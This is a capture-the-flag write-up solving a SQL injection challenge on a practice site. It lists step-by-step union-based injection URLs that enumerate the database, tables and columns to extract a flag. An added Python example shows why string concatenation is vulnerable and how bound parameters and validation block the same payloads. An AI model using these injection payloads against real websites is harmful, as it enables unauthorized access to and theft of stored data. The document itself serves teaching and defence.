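26. This one looks fairly simple!
Analysis:
This challenge is clearly a SQL injection problem; here we inject manually:
1. Check whether an injection point exists
http://ctf5.shiyanbar.com/8/index.php?id=1 and 1=1
http://ctf5.shiyanbar.com/8/index.php?id=1 and 1=2
The two responses differ, which shows that an injection point exists.
2. Guess the number of columns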
http://ctf5.shiyanbar.com/8/index.php?id=1 order by 2
http://ctf5.shiyanbar.com/8/index.php?id=1 order by 3
The number of columns is 2.
3. Find the database
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,schema_name from information_schema.schemata
http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,database()
my_db is the database we are looking for.
4. Find the tables
http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=%27my_db%27
This finds the table thiskey.
5. List the columns of the thiskey table
http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=%27my_db%27
This reveals the column k0y.
6. Read the data in the k0y column
http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,k0y%20from%20thiskey
This gives the flag.
We could also use the sqlmap tool for the injection here; it is not covered in this write-up, so try it yourself.
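Why the steps above work, and what stops them, as an added example that is not part of the original write-up or the challenge's own code. It assumes the page builds its query by concatenating `id` into the SQL text; SQLite stands in for MySQL, the `pages` table and the flag value are constructed, and only `thiskey`/`k0y` come from the write-up.

```python
import sqlite3

# Payload from step 6 of the write-up, URL-decoded.
PAYLOAD = "1 union select 1,k0y from thiskey"


def make_db():
    """Constructed sample data; SQLite stands in for the challenge's MySQL."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT);  -- hypothetical
        INSERT INTO pages VALUES (1, 'hello');
        CREATE TABLE thiskey (k0y TEXT);          -- names taken from the write-up
        INSERT INTO thiskey VALUES ('flag{constructed-sample}');
    """)
    return db


def lookup_vulnerable(db, raw_id):
    # Assumed server behaviour: the parameter is pasted into the SQL text,
    # so "and 1=2" or "union select ..." becomes part of the statement.
    return db.execute("SELECT id, title FROM pages WHERE id = " + raw_id).fetchall()


def lookup_parameterized(db, raw_id):
    # The value is bound as data; it cannot add a predicate or a UNION.
    return db.execute("SELECT id, title FROM pages WHERE id = ?", (raw_id,)).fetchall()


def lookup_validated(db, raw_id):
    # Defence in depth: accept only a plain ASCII integer, then bind it.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be an integer")
    return lookup_parameterized(db, int(raw_id))


if __name__ == "__main__":
    db = make_db()
    for raw in ("1", "1 and 1=2", PAYLOAD):
        print(repr(raw))
        print("  concatenated :", lookup_vulnerable(db, raw))
        print("  parameterized:", lookup_parameterized(db, raw))
```

With the bound parameter the whole payload is compared to `id` as a single value, so the differing responses from step 1 and the extra rows from steps 3 to 6 both disappear.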